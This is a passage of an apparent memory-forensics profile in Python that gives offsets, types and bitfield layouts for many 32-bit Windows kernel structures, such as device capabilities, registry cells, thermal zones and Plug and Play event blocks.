'Allocation' : [ 0x14, ['pointer', ['_RTL_RANGE_LIST']]],
'PossibleAllocation' : [ 0x18, ['pointer', ['_RTL_RANGE_LIST']]],
'OrderingList' : [ 0x1c, ['_ARBITER_ORDERING_LIST']],
'ReservedList' : [ 0x24, ['_ARBITER_ORDERING_LIST']],
'ReferenceCount' : [ 0x2c, ['long']],
'Interface' : [ 0x30, ['pointer', ['_ARBITER_INTERFACE']]],
'AllocationStackMaxSize' : [ 0x34, ['unsigned long']],
'AllocationStack' : [ 0x38, ['pointer', ['_ARBITER_ALLOCATION_STATE']]],
'UnpackRequirement' : [ 0x3c, ['pointer', ['void']]],
'PackResource' : [ 0x40, ['pointer', ['void']]],
'UnpackResource' : [ 0x44, ['pointer', ['void']]],
'ScoreRequirement' : [ 0x48, ['pointer', ['void']]],
'TestAllocation' : [ 0x4c, ['pointer', ['void']]],
'RetestAllocation' : [ 0x50, ['pointer', ['void']]],
'CommitAllocation' : [ 0x54, ['pointer', ['void']]],
'RollbackAllocation' : [ 0x58, ['pointer', ['void']]],
'BootAllocation' : [ 0x5c, ['pointer', ['void']]],
'QueryArbitrate' : [ 0x60, ['pointer', ['void']]],
'QueryConflict' : [ 0x64, ['pointer', ['void']]],
'AddReserved' : [ 0x68, ['pointer', ['void']]],
'StartArbiter' : [ 0x6c, ['pointer', ['void']]],
'PreprocessEntry' : [ 0x70, ['pointer', ['void']]],
'AllocateEntry' : [ 0x74, ['pointer', ['void']]],
'GetNextAllocationRange' : [ 0x78, ['pointer', ['void']]],
'FindSuitableRange' : [ 0x7c, ['pointer', ['void']]],
'AddAllocation' : [ 0x80, ['pointer', ['void']]],
'BacktrackAllocation' : [ 0x84, ['pointer', ['void']]],
'OverrideConflict' : [ 0x88, ['pointer', ['void']]],
'InitializeRangeList' : [ 0x8c, ['pointer', ['void']]],
'TransactionInProgress' : [ 0x90, ['unsigned char']],
'TransactionEvent' : [ 0x94, ['pointer', ['_KEVENT']]],
'Extension' : [ 0x98, ['pointer', ['void']]],
'BusDeviceObject' : [ 0x9c, ['pointer', ['_DEVICE_OBJECT']]],
'ConflictCallbackContext' : [ 0xa0, ['pointer', ['void']]],
'ConflictCallback' : [ 0xa4, ['pointer', ['void']]],
'PdoDescriptionString' : [ 0xa8, ['array', 336, ['wchar']]],
'PdoSymbolicNameString' : [ 0x348, ['array', 672, ['unsigned char']]],
'PdoAddressString' : [ 0x5e8, ['array', 1, ['wchar']]],
} ],
'_KDEVICE_QUEUE_ENTRY' : [ 0x10, {
'DeviceListEntry' : [ 0x0, ['_LIST_ENTRY']],
'SortKey' : [ 0x8, ['unsigned long']],
'Inserted' : [ 0xc, ['unsigned char']],
} ],
'__unnamed_1e1e' : [ 0x4, {
'UserData' : [ 0x0, ['unsigned long']],
'Next' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_1e20' : [ 0x8, {
'Last' : [ 0x0, ['unsigned long']],
'u' : [ 0x4, ['__unnamed_1e1e']],
} ],
'__unnamed_1e22' : [ 0x4, {
'u' : [ 0x0, ['__unnamed_1e1e']],
} ],
'__unnamed_1e24' : [ 0x8, {
'OldCell' : [ 0x0, ['__unnamed_1e20']],
'NewCell' : [ 0x0, ['__unnamed_1e22']],
} ],
'_HCELL' : [ 0xc, {
'Size' : [ 0x0, ['long']],
'u' : [ 0x4, ['__unnamed_1e24']],
} ],
'_HMAP_TABLE' : [ 0x2000, {
'Table' : [ 0x0, ['array', 512, ['_HMAP_ENTRY']]],
} ],
'_PROC_PERF_CONSTRAINT' : [ 0x24, {
'Prcb' : [ 0x0, ['pointer', ['_KPRCB']]],
'PerfContext' : [ 0x4, ['unsigned long']],
'PercentageCap' : [ 0x8, ['unsigned long']],
'ThermalCap' : [ 0xc, ['unsigned long']],
'TargetFrequency' : [ 0x10, ['unsigned long']],
'AcumulatedFullFrequency' : [ 0x14, ['unsigned long']],
'AcumulatedZeroFrequency' : [ 0x18, ['unsigned long']],
'FrequencyHistoryTotal' : [ 0x1c, ['unsigned long']],
'AverageFrequency' : [ 0x20, ['unsigned long']],
} ],
'_IMAGE_DATA_DIRECTORY' : [ 0x8, {
'VirtualAddress' : [ 0x0, ['unsigned long']],
'Size' : [ 0x4, ['unsigned long']],
} ],
'_DEVICE_CAPABILITIES' : [ 0x40, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'DeviceD1' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DeviceD2' : [ 0x4, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'LockSupported' : [ 0x4, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'EjectSupported' : [ 0x4, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Removable' : [ 0x4, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'DockDevice' : [ 0x4, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'UniqueID' : [ 0x4, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'SilentInstall' : [ 0x4, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'RawDeviceOK' : [ 0x4, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'SurpriseRemovalOK' : [ 0x4, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'WakeFromD0' : [ 0x4, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'WakeFromD1' : [ 0x4, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'WakeFromD2' : [ 0x4, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'WakeFromD3' : [ 0x4, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'HardwareDisabled' : [ 0x4, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'NonDynamic' : [ 0x4, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'WarmEjectSupported' : [ 0x4, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'NoDisplayInUI' : [ 0x4, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'Reserved1' : [ 0x4, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'Reserved' : [ 0x4, ['BitField', dict(start_bit = 19, end_bit = 32, native_type='unsigned long')]],
'Address' : [ 0x8, ['unsigned long']],
'UINumber' : [ 0xc, ['unsigned long']],
'DeviceState' : [ 0x10, ['array', -28, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]]],
'SystemWake' : [ 0x2c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DeviceWake' : [ 0x30, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
'D1Latency' : [ 0x34, ['unsigned long']],
'D2Latency' : [ 0x38, ['unsigned long']],
'D3Latency' : [ 0x3c, ['unsigned long']],
} ],
'_CACHED_KSTACK_LIST' : [ 0x18, {
'SListHead' : [ 0x0, ['_SLIST_HEADER']],
'MinimumFree' : [ 0x8, ['long']],
'Misses' : [ 0xc, ['unsigned long']],
'MissesLast' : [ 0x10, ['unsigned long']],
'Pad0' : [ 0x14, ['unsigned long']],
} ],
'__unnamed_1e37' : [ 0x18, {
'Length' : [ 0x0, ['unsigned long']],
'Alignment' : [ 0x4, ['unsigned long']],
'MinimumAddress' : [ 0x8, ['_LARGE_INTEGER']],
'MaximumAddress' : [ 0x10, ['_LARGE_INTEGER']],
} ],
'__unnamed_1e3b' : [ 0x14, {
'MinimumVector' : [ 0x0, ['unsigned long']],
'MaximumVector' : [ 0x4, ['unsigned long']],
'AffinityPolicy' : [ 0x8, ['unsigned short']],
'Group' : [ 0xa, ['unsigned short']],
'PriorityPolicy' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'IrqPriorityUndefined', 1: 'IrqPriorityLow', 2: 'IrqPriorityNormal', 3: 'IrqPriorityHigh'})]],
'TargetedProcessors' : [ 0x10, ['unsigned long']],
} ],
'__unnamed_1e3d' : [ 0x8, {
'MinimumChannel' : [ 0x0, ['unsigned long']],
'MaximumChannel' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1e3f' : [ 0xc, {
'Data' : [ 0x0, ['array', 3, ['unsigned long']]],
} ],
'__unnamed_1e41' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'MinBusNumber' : [ 0x4, ['unsigned long']],
'MaxBusNumber' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_1e43' : [ 0xc, {
'Priority' : [ 0x0, ['unsigned long']],
'Reserved1' : [ 0x4, ['unsigned long']],
'Reserved2' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1e45' : [ 0x18, {
'Length40' : [ 0x0, ['unsigned long']],
'Alignment40' : [ 0x4, ['unsigned long']],
'MinimumAddress' : [ 0x8, ['_LARGE_INTEGER']],
'MaximumAddress' : [ 0x10, ['_LARGE_INTEGER']],
} ],
'__unnamed_1e47' : [ 0x18, {
'Length48' : [ 0x0, ['unsigned long']],
'Alignment48' : [ 0x4, ['unsigned long']],
'MinimumAddress' : [ 0x8, ['_LARGE_INTEGER']],
'MaximumAddress' : [ 0x10, ['_LARGE_INTEGER']],
} ],
'__unnamed_1e49' : [ 0x18, {
'Length64' : [ 0x0, ['unsigned long']],
'Alignment64' : [ 0x4, ['unsigned long']],
'MinimumAddress' : [ 0x8, ['_LARGE_INTEGER']],
'MaximumAddress' : [ 0x10, ['_LARGE_INTEGER']],
} ],
'__unnamed_1e4b' : [ 0x18, {
'Port' : [ 0x0, ['__unnamed_1e37']],
'Memory' : [ 0x0, ['__unnamed_1e37']],
'Interrupt' : [ 0x0, ['__unnamed_1e3b']],
'Dma' : [ 0x0, ['__unnamed_1e3d']],
'Generic' : [ 0x0, ['__unnamed_1e37']],
'DevicePrivate' : [ 0x0, ['__unnamed_1e3f']],
'BusNumber' : [ 0x0, ['__unnamed_1e41']],
'ConfigData' : [ 0x0, ['__unnamed_1e43']],
'Memory40' : [ 0x0, ['__unnamed_1e45']],
'Memory48' : [ 0x0, ['__unnamed_1e47']],
'Memory64' : [ 0x0, ['__unnamed_1e49']],
} ],
'_IO_RESOURCE_DESCRIPTOR' : [ 0x20, {
'Option' : [ 0x0, ['unsigned char']],
'Type' : [ 0x1, ['unsigned char']],
'ShareDisposition' : [ 0x2, ['unsigned char']],
'Spare1' : [ 0x3, ['unsigned char']],
'Flags' : [ 0x4, ['unsigned short']],
'Spare2' : [ 0x6, ['unsigned short']],
'u' : [ 0x8, ['__unnamed_1e4b']],
} ],
'_POP_THERMAL_ZONE' : [ 0x150, {
'Link' : [ 0x0, ['_LIST_ENTRY']],
'State' : [ 0x8, ['unsigned char']],
'Flags' : [ 0x9, ['unsigned char']],
'Mode' : [ 0xa, ['unsigned char']],
'PendingMode' : [ 0xb, ['unsigned char']],
'ActivePoint' : [ 0xc, ['unsigned char']],
'PendingActivePoint' : [ 0xd, ['unsigned char']],
'Throttle' : [ 0x10, ['long']],
'LastTime' : [ 0x18, ['unsigned long long']],
'SampleRate' : [ 0x20, ['unsigned long']],
'LastTemp' : [ 0x24, ['unsigned long']],
'PassiveTimer' : [ 0x28, ['_KTIMER']],
'PassiveDpc' : [ 0x50, ['_KDPC']],
'OverThrottled' : [ 0x70, ['_POP_ACTION_TRIGGER']],
'Irp' : [ 0x80, ['pointer', ['_IRP']]],
'Info' : [ 0x84, ['_THERMAL_INFORMATION_EX']],
'InfoLastUpdateTime' : [ 0xe0, ['_LARGE_INTEGER']],
'Metrics' : [ 0xe8, ['_POP_THERMAL_ZONE_METRICS']],
} ],
'_MMPTE_LIST' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'OneEntry' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'filler0' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'filler1' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'NextEntry' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_VI_POOL_PAGE_HEADER' : [ 0xc, {
'NextPage' : [ 0x0, ['pointer', ['_SINGLE_LIST_ENTRY']]],
'VerifierEntry' : [ 0x4, ['pointer', ['void']]],
'Signature' : [ 0x8, ['unsigned long']],
} ],
'_HANDLE_TRACE_DEBUG_INFO' : [ 0x80, {
'RefCount' : [ 0x0, ['long']],
'TableSize' : [ 0x4, ['unsigned long']],
'BitMaskFlags' : [ 0x8, ['unsigned long']],
'CloseCompactionLock' : [ 0xc, ['_FAST_MUTEX']],
'CurrentStackIndex' : [ 0x2c, ['unsigned long']],
'TraceDb' : [ 0x30, ['array', 1, ['_HANDLE_TRACE_DB_ENTRY']]],
} ],
'_CM_WORKITEM' : [ 0x14, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Private' : [ 0x8, ['unsigned long']],
'WorkerRoutine' : [ 0xc, ['pointer', ['void']]],
'Parameter' : [ 0x10, ['pointer', ['void']]],
} ],
'_POP_THERMAL_ZONE_METRICS' : [ 0x68, {
'MetricsResource' : [ 0x0, ['_ERESOURCE']],
'ActiveCount' : [ 0x38, ['unsigned long']],
'PassiveCount' : [ 0x3c, ['unsigned long']],
'LastActiveStartTick' : [ 0x40, ['_LARGE_INTEGER']],
'AverageActiveTime' : [ 0x48, ['_LARGE_INTEGER']],
'LastPassiveStartTick' : [ 0x50, ['_LARGE_INTEGER']],
'AveragePassiveTime' : [ 0x58, ['_LARGE_INTEGER']],
'StartTickSinceLastReset' : [ 0x60, ['_LARGE_INTEGER']],
} ],
'_CM_TRANS' : [ 0x68, {
'TransactionListEntry' : [ 0x0, ['_LIST_ENTRY']],
'KCBUoWListHead' : [ 0x8, ['_LIST_ENTRY']],
'LazyCommitListEntry' : [ 0x10, ['_LIST_ENTRY']],
'KtmTrans' : [ 0x18, ['pointer', ['void']]],
'CmRm' : [ 0x1c, ['pointer', ['_CM_RM']]],
'KtmEnlistmentObject' : [ 0x20, ['pointer', ['_KENLISTMENT']]],
'KtmEnlistmentHandle' : [ 0x24, ['pointer', ['void']]],
'KtmUow' : [ 0x28, ['_GUID']],
'StartLsn' : [ 0x38, ['unsigned long long']],
'TransState' : [ 0x40, ['unsigned long']],
'HiveCount' : [ 0x44, ['unsigned long']],
'HiveArray' : [ 0x48, ['array', 7, ['pointer', ['_CMHIVE']]]],
} ],
'_WHEA_ERROR_RECORD_HEADER_VALIDBITS' : [ 0x4, {
'PlatformId' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Timestamp' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'PartitionId' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'AsULONG' : [ 0x0, ['unsigned long']],
} ],
'_CM_PARTIAL_RESOURCE_LIST' : [ 0x18, {
'Version' : [ 0x0, ['unsigned short']],
'Revision' : [ 0x2, ['unsigned short']],
'Count' : [ 0x4, ['unsigned long']],
'PartialDescriptors' : [ 0x8, ['array', 1, ['_CM_PARTIAL_RESOURCE_DESCRIPTOR']]],
} ],
'_RTL_RANGE_LIST' : [ 0x14, {
'ListHead' : [ 0x0, ['_LIST_ENTRY']],
'Flags' : [ 0x8, ['unsigned long']],
'Count' : [ 0xc, ['unsigned long']],
'Stamp' : [ 0x10, ['unsigned long']],
} ],
'_OBJECT_CREATE_INFORMATION' : [ 0x2c, {
'Attributes' : [ 0x0, ['unsigned long']],
'RootDirectory' : [ 0x4, ['pointer', ['void']]],
'ProbeMode' : [ 0x8, ['unsigned char']],
'PagedPoolCharge' : [ 0xc, ['unsigned long']],
'NonPagedPoolCharge' : [ 0x10, ['unsigned long']],
'SecurityDescriptorCharge' : [ 0x14, ['unsigned long']],
'SecurityDescriptor' : [ 0x18, ['pointer', ['void']]],
'SecurityQos' : [ 0x1c, ['pointer', ['_SECURITY_QUALITY_OF_SERVICE']]],
'SecurityQualityOfService' : [ 0x20, ['_SECURITY_QUALITY_OF_SERVICE']],
} ],
'_RTL_CRITICAL_SECTION_DEBUG' : [ 0x20, {
'Type' : [ 0x0, ['unsigned short']],
'CreatorBackTraceIndex' : [ 0x2, ['unsigned short']],
'CriticalSection' : [ 0x4, ['pointer', ['_RTL_CRITICAL_SECTION']]],
'ProcessLocksList' : [ 0x8, ['_LIST_ENTRY']],
'EntryCount' : [ 0x10, ['unsigned long']],
'ContentionCount' : [ 0x14, ['unsigned long']],
'Flags' : [ 0x18, ['unsigned long']],
'CreatorBackTraceIndexHigh' : [ 0x1c, ['unsigned short']],
'SpareUSHORT' : [ 0x1e, ['unsigned short']],
} ],
'_POOL_HACKER' : [ 0x28, {
'Header' : [ 0x0, ['_POOL_HEADER']],
'Contents' : [ 0x8, ['array', 8, ['unsigned long']]],
} ],
'_PO_DIAG_STACK_RECORD' : [ 0x8, {
'StackDepth' : [ 0x0, ['unsigned long']],
'Stack' : [ 0x4, ['array', 1, ['pointer', ['void']]]],
} ],
'_SECTION_OBJECT_POINTERS' : [ 0xc, {
'DataSectionObject' : [ 0x0, ['pointer', ['void']]],
'SharedCacheMap' : [ 0x4, ['pointer', ['void']]],
'ImageSectionObject' : [ 0x8, ['pointer', ['void']]],
} ],
'_VF_BTS_DATA_MANAGEMENT_AREA' : [ 0x34, {
'BTSBufferBase' : [ 0x0, ['pointer', ['void']]],
'BTSIndex' : [ 0x4, ['pointer', ['void']]],
'BTSMax' : [ 0x8, ['pointer', ['void']]],
'BTSInterruptThreshold' : [ 0xc, ['pointer', ['void']]],
'PEBSBufferBase' : [ 0x10, ['pointer', ['void']]],
'PEBSIndex' : [ 0x14, ['pointer', ['void']]],
'PEBSMax' : [ 0x18, ['pointer', ['void']]],
'PEBSInterruptThreshold' : [ 0x1c, ['pointer', ['void']]],
'PEBSCounterReset' : [ 0x20, ['array', 2, ['pointer', ['void']]]],
'Reserved' : [ 0x28, ['array', 12, ['unsigned char']]],
} ],
'_FLOATING_SAVE_AREA' : [ 0x70, {
'ControlWord' : [ 0x0, ['unsigned long']],
'StatusWord' : [ 0x4, ['unsigned long']],
'TagWord' : [ 0x8, ['unsigned long']],
'ErrorOffset' : [ 0xc, ['unsigned long']],
'ErrorSelector' : [ 0x10, ['unsigned long']],
'DataOffset' : [ 0x14, ['unsigned long']],
'DataSelector' : [ 0x18, ['unsigned long']],
'RegisterArea' : [ 0x1c, ['array', 80, ['unsigned char']]],
'Cr0NpxState' : [ 0x6c, ['unsigned long']],
} ],
'_SEP_AUDIT_POLICY' : [ 0x1c, {
'AdtTokenPolicy' : [ 0x0, ['_TOKEN_AUDIT_POLICY']],
'PolicySetStatus' : [ 0x1b, ['unsigned char']],
} ],
'__unnamed_1e88' : [ 0x4, {
'SnapSharedExportsFailed' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_1e8a' : [ 0xc, {
'AllSharedExportThunks' : [ 0x0, ['_VF_TARGET_ALL_SHARED_EXPORT_THUNKS']],
'Flags' : [ 0x0, ['__unnamed_1e88']],
} ],
'_VF_TARGET_DRIVER' : [ 0x18, {
'TreeNode' : [ 0x0, ['_VF_AVL_TREE_NODE']],
'u1' : [ 0x8, ['__unnamed_1e8a']],
'VerifiedData' : [ 0x14, ['pointer', ['_VF_TARGET_VERIFIED_DRIVER_DATA']]],
} ],
'__unnamed_1e92' : [ 0x14, {
'ClassGuid' : [ 0x0, ['_GUID']],
'SymbolicLinkName' : [ 0x10, ['array', 1, ['wchar']]],
} ],
'__unnamed_1e94' : [ 0x2, {
'DeviceIds' : [ 0x0, ['array', 1, ['wchar']]],
} ],
'__unnamed_1e96' : [ 0x2, {
'DeviceId' : [ 0x0, ['array', 1, ['wchar']]],
} ],
'__unnamed_1e98' : [ 0x8, {
'NotificationStructure' : [ 0x0, ['pointer', ['void']]],
'DeviceIds' : [ 0x4, ['array', 1, ['wchar']]],
} ],
'__unnamed_1e9a' : [ 0x4, {
'Notification' : [ 0x0, ['pointer', ['void']]],
} ],
'__unnamed_1e9c' : [ 0x8, {
'NotificationCode' : [ 0x0, ['unsigned long']],
'NotificationData' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1e9e' : [ 0x8, {
'VetoType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PNP_VetoTypeUnknown', 1: 'PNP_VetoLegacyDevice', 2: 'PNP_VetoPendingClose', 3: 'PNP_VetoWindowsApp', 4: 'PNP_VetoWindowsService', 5: 'PNP_VetoOutstandingOpen', 6: 'PNP_VetoDevice', 7: 'PNP_VetoDriver', 8: 'PNP_VetoIllegalDeviceRequest', 9: 'PNP_VetoInsufficientPower', 10: 'PNP_VetoNonDisableable', 11: 'PNP_VetoLegacyDriver', 12: 'PNP_VetoInsufficientRights'})]],
'DeviceIdVetoNameBuffer' : [ 0x4, ['array', 1, ['wchar']]],
} ],
'__unnamed_1ea0' : [ 0x10, {
'BlockedDriverGuid' : [ 0x0, ['_GUID']],
} ],
'__unnamed_1ea2' : [ 0x2, {
'ParentId' : [ 0x0, ['array', 1, ['wchar']]],
} ],
'__unnamed_1ea4' : [ 0x20, {
'PowerSettingGuid' : [ 0x0, ['_GUID']],
'Flags' : [ 0x10, ['unsigned long']],
'SessionId' : [ 0x14, ['unsigned long']],
'DataLength' : [ 0x18, ['unsigned long']],
'Data' : [ 0x1c, ['array', 1, ['unsigned char']]],
} ],
'__unnamed_1ea6' : [ 0x20, {
'DeviceClass' : [ 0x0, ['__unnamed_1e92']],
'TargetDevice' : [ 0x0, ['__unnamed_1e94']],
'InstallDevice' : [ 0x0, ['__unnamed_1e96']],
'CustomNotification' : [ 0x0, ['__unnamed_1e98']],
'ProfileNotification' : [ 0x0, ['__unnamed_1e9a']],
'PowerNotification' : [ 0x0, ['__unnamed_1e9c']],
'VetoNotification' : [ 0x0, ['__unnamed_1e9e']],
'BlockedDriverNotification' : [ 0x0, ['__unnamed_1ea0']],
'InvalidIDNotification' : [ 0x0, ['__unnamed_1ea2']],
'PowerSettingNotification' : [ 0x0, ['__unnamed_1ea4']],
'PropertyChangeNotification' : [ 0x0, ['__unnamed_1e96']],
} ],
'_PLUGPLAY_EVENT_BLOCK' : [ 0x44, {
'EventGuid' : [ 0x0, ['_GUID']],
'EventCategory' : [ 0x10, ['Enumeration', dict(target = 'long', choices = {0: 'HardwareProfileChangeEvent', 1: 'TargetDeviceChangeEvent', 2: 'DeviceClassChangeEvent', 3: 'CustomDeviceEvent', 4: 'DeviceInstallEvent', 5: 'DeviceArrivalEvent', 6: 'VetoEvent', 7: 'BlockedDriverEvent', 8: 'InvalidIDEvent', 9: 'DevicePropertyChangeEvent', 10: 'DeviceInstanceRemovalEvent', 11: 'MaxPlugEventCategory'})]],
'Result' : [ 0x14, ['pointer', ['unsigned long']]],
'Flags' : [ 0x18, ['unsigned long']],
'TotalSize' : [ 0x1c, ['unsigned long']],
'DeviceObject' : [ 0x20, ['pointer', ['void']]],
'u' : [ 0x24, ['__unnamed_1ea6']],
} ],
'_VF_SUSPECT_DRIVER_ENTRY' : [ 0x18, {
'Links' : [ 0x0, ['_LIST_ENTRY']],
'Loads' : [ 0x8, ['unsigned long']],
'Unloads' : [ 0xc, ['unsigned long']],
'BaseName' : [ 0x10, ['_UNICODE_STRING']],
} ],
'_MMPTE_TIMESTAMP' : [ 0x4, {
'MustBeZero' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PageFileLow' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 5, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Transition' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'GlobalTimeStamp' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_SID_AND_ATTRIBUTES_HASH' : [ 0x88, {
'SidCount' : [ 0x0, ['unsigned long']],
'SidAttr' : [ 0x4, ['pointer', ['_SID_AND_ATTRIBUTES']]],
'Hash' : [ 0x8, ['array', 32, ['unsigned long']]],
} ],
'_XSTATE_CONTEXT' : [ 0x20, {
'Mask' : [ 0x0, ['unsigned long long']],
'Length' : [ 0x8, ['unsigned long']],
'Reserved1' : [ 0xc, ['unsigned long']],
'Area' : [ 0x10, ['pointer', ['_XSAVE_AREA']]],
'Reserved2' : [ 0x14, ['unsigned long']],
'Buffer' : [ 0x18, ['pointer', ['void']]],
'Reserved3' : [ 0x1c, ['unsigned long']],
} ],
'_XSAVE_FORMAT' : [ 0x200, {
'ControlWord' : [ 0x0, ['unsigned short']],
'StatusWord' : [ 0x2, ['unsigned short']],
'TagWord' : [ 0x4, ['unsigned char']],
'Reserved1' : [ 0x5, ['unsigned char']],
'ErrorOpcode' : [ 0x6, ['unsigned short']],
'ErrorOffset' : [ 0x8, ['unsigned long']],
'ErrorSelector' : [ 0xc, ['unsigned short']],
'Reserved2' : [ 0xe, ['unsigned short']],
'DataOffset' : [ 0x10, ['unsigned long']],
'DataSelector' : [ 0x14, ['unsigned short']],
'Reserved3' : [ 0x16, ['unsigned short']],
'MxCsr' : [ 0x18, ['unsigned long']],
'MxCsr_Mask' : [ 0x1c, ['unsigned long']],
'FloatRegisters' : [ 0x20, ['array', 8, ['_M128A']]],
'XmmRegisters' : [ 0xa0, ['array', 8, ['_M128A']]],
'Reserved4' : [ 0x120, ['array', 192, ['unsigned char']]],
'StackControl' : [ 0x1e0, ['array', 7, ['unsigned long']]],
'Cr0NpxState' : [ 0x1fc, ['unsigned long']],
} ],
'_MBCB' : [ 0x88, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeIsInZone' : [ 0x2, ['short']],
'PagesToWrite' : [ 0x4, ['unsigned long']],
'DirtyPages' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
'BitmapRanges' : [ 0x10, ['_LIST_ENTRY']],
'ResumeWritePage' : [ 0x18, ['long long']],
'MostRecentlyDirtiedPage' : [ 0x20, ['long long']],
'BitmapRange1' : [ 0x28, ['_BITMAP_RANGE']],
'BitmapRange2' : [ 0x48, ['_BITMAP_RANGE']],
'BitmapRange3' : [ 0x68, ['_BITMAP_RANGE']],
} ],
'_PS_CPU_QUOTA_BLOCK' : [ 0x880, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'SessionId' : [ 0x8, ['unsigned long']],
'CpuShareWeight' : [ 0xc, ['unsigned long']],
'CapturedWeightData' : [ 0x10, ['_PSP_CPU_SHARE_CAPTURED_WEIGHT_DATA']],
'DuplicateInputMarker' : [ 0x18, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Reserved' : [ 0x18, ['BitField', dict(start_bit = 1, end_bit = 32, native_type='unsigned long')]],
'MiscFlags' : [ 0x18, ['long']],
'BlockCurrentGenerationLock' : [ 0x0, ['unsigned long']],
'CyclesAccumulated' : [ 0x8, ['unsigned long long']],
'CycleCredit' : [ 0x40, ['unsigned long long']],
'BlockCurrentGeneration' : [ 0x48, ['unsigned long']],
'CpuCyclePercent' : [ 0x4c, ['unsigned long']],
'CyclesFinishedForCurrentGeneration' : [ 0x50, ['unsigned char']],
'Cpu' : [ 0x80, ['array', 32, ['_PS_PER_CPU_QUOTA_CACHE_AWARE']]],
} ],
'__unnamed_1ec1' : [ 0x1, {
'AsUCHAR' : [ 0x0, ['unsigned char']],
'NoDomainAccounting' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'IncreasePolicy' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 3, native_type='unsigned char')]],
'DecreasePolicy' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 5, native_type='unsigned char')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 8, native_type='unsigned char')]],
} ],
'PROCESSOR_PERFSTATE_POLICY' : [ 0x1c, {
'Revision' : [ 0x0, ['unsigned long']],
'MaxThrottle' : [ 0x4, ['unsigned char']],
'MinThrottle' : [ 0x5, ['unsigned char']],
'BusyAdjThreshold' : [ 0x6, ['unsigned char']],
'Spare' : [ 0x7, ['unsigned char']],
'Flags' : [ 0x7, ['__unnamed_1ec1']],
